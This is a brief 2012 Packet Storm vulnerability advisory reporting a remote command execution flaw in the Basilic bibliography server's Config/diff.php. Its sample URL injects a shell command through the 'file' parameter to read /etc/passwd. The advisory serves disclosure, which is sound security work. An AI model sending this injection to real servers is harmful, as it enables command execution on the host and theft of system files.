Basilic Remote Command Execution

2012-06-30T00:00:00
ID PACKETSTORM:114368
Type packetstorm
Reporter M.Razavi
Modified 2012-06-30T00:00:00

Description

                                        
                                            `Hi  
Dear Sir  
  
Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center.  
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.  
sample:  
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2  
  
Regards  
M.Razavi  
`